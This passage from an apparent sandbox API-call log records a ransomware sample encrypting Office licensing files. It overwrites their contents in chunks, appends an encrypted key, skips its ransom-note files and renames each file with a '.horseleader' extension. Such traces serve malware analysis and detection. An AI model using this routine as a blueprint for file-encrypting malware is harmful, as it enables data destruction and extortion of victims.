lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.364] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.364] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.364] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.364] CloseHandle (hObject=0x158) 
returned 1 [0245.364] GetProcessHeap () returned 0x780000 [0245.364] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.364] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.horseleader") returned 108 [0245.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll.horseleader")) returned 1 [0245.366] GetProcessHeap () returned 0x780000 [0245.366] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.366] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332800, ftCreationTime.dwHighDateTime=0x1cabc8a, ftLastAccessTime.dwLowDateTime=0x59948fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf332800, ftLastWriteTime.dwHighDateTime=0x1cabc8a, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPREARM.EXE", cAlternateFileName="OSPPRE~1.EXE")) returned 1 [0245.366] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="Windows") returned -1 [0245.366] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE") returned 97 [0245.366] StrStrIW (lpFirst="OSPPREARM.EXE", lpSrch=".horseleader") returned 0x0 [0245.366] lstrcmpW 
(lpString1="OSPPREARM.EXE", lpString2="#Decrypt#.txt") returned 1 [0245.366] lstrcmpW (lpString1="OSPPREARM.EXE", lpString2="_uninstalling_.png") returned 1 [0245.366] lstrlenW (lpString=".testttjffg") returned 11 [0245.366] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE", lpSrch=".testttjffg") returned 0x0 [0245.366] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.367] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.367] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE") returned 97 [0245.367] StrStrW (lpFirst="OSPPREARM.EXE", lpSrch=".txt") returned 0x0 [0245.367] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15712) returned 1 [0245.368] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3d60, lpOverlapped=0x0) returned 1 [0245.370] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc2a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.370] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | 
out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3d60, lpOverlapped=0x0) returned 1 [0245.370] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.370] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.371] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.371] CloseHandle (hObject=0x158) returned 1 [0245.371] GetProcessHeap () returned 0x780000 [0245.371] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.371] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE.horseleader") returned 109 [0245.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\ospprearm.exe.horseleader")) returned 1 [0245.372] GetProcessHeap () returned 0x780000 [0245.372] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.372] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, 
ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59995270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x4b2700, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPSVC.EXE", cAlternateFileName="")) returned 1 [0245.372] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="Windows") returned -1 [0245.372] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE") returned 95 [0245.372] StrStrIW (lpFirst="OSPPSVC.EXE", lpSrch=".horseleader") returned 0x0 [0245.372] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="#Decrypt#.txt") returned 1 [0245.372] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="_uninstalling_.png") returned 1 [0245.372] lstrlenW (lpString=".testttjffg") returned 11 [0245.372] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE", lpSrch=".testttjffg") returned 0x0 [0245.372] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.372] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE") 
returned 95 [0245.373] StrStrW (lpFirst="OSPPSVC.EXE", lpSrch=".txt") returned 0x0 [0245.373] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4925184) returned 1 [0245.373] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.373] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.376] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.377] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.378] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x256b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.378] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.381] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.381] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.381] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4ad700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.381] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.383] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.384] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.384] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.384] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.384] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.384] CloseHandle (hObject=0x158) returned 1 [0245.384] GetProcessHeap () returned 0x780000 [0245.385] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.385] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE.horseleader") returned 107 [0245.385] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE.horseleader" 
(normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe.horseleader")) returned 1 [0245.386] GetProcessHeap () returned 0x780000 [0245.386] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.386] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59995270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x23b10, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPWMI.DLL", cAlternateFileName="")) returned 1 [0245.386] lstrcmpiW (lpString1="OSPPWMI.DLL", lpString2="Windows") returned -1 [0245.386] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL") returned 95 [0245.386] StrStrIW (lpFirst="OSPPWMI.DLL", lpSrch=".horseleader") returned 0x0 [0245.386] lstrcmpW (lpString1="OSPPWMI.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.386] lstrcmpW (lpString1="OSPPWMI.DLL", lpString2="_uninstalling_.png") returned 1 [0245.386] lstrlenW (lpString=".testttjffg") returned 11 [0245.386] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL", lpSrch=".testttjffg") returned 0x0 [0245.386] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.387] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.387] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL") returned 95 [0245.387] StrStrW (lpFirst="OSPPWMI.DLL", lpSrch=".txt") returned 0x0 [0245.387] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=146192) returned 1 [0245.388] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.388] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.390] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.390] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.391] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xf588, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.391] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.391] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0245.392] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.392] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1eb10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.392] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.393] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.393] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.393] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.394] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.394] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.394] CloseHandle (hObject=0x158) returned 1 [0245.394] GetProcessHeap () returned 0x780000 [0245.394] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.394] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL.horseleader") returned 107 [0245.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.dll.horseleader")) returned 1 [0245.395] GetProcessHeap () returned 0x780000 [0245.395] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.395] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0xba5e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPWMI.MOF", cAlternateFileName="")) returned 1 [0245.395] lstrcmpiW (lpString1="OSPPWMI.MOF", lpString2="Windows") returned -1 [0245.395] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF") returned 95 [0245.395] StrStrIW (lpFirst="OSPPWMI.MOF", lpSrch=".horseleader") returned 0x0 [0245.395] lstrcmpW (lpString1="OSPPWMI.MOF", lpString2="#Decrypt#.txt") returned 1 [0245.395] lstrcmpW (lpString1="OSPPWMI.MOF", lpString2="_uninstalling_.png") returned 1 [0245.395] lstrlenW (lpString=".testttjffg") returned 11 [0245.395] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF", lpSrch=".testttjffg") returned 0x0 [0245.396] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.396] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.396] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF") returned 95 [0245.396] StrStrW (lpFirst="OSPPWMI.MOF", lpSrch=".txt") returned 0x0 [0245.396] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=47710) returned 1 [0245.396] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.418] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.418] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.418] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, 
lpOverlapped=0x0) returned 1 [0245.418] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.419] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.419] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1a5e, lpOverlapped=0x0) returned 1 [0245.419] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe5a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.419] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1a5e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1a5e, lpOverlapped=0x0) returned 1 [0245.419] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.419] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.419] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.420] CloseHandle (hObject=0x158) returned 1 [0245.420] GetProcessHeap () returned 0x780000 [0245.420] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.420] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program 
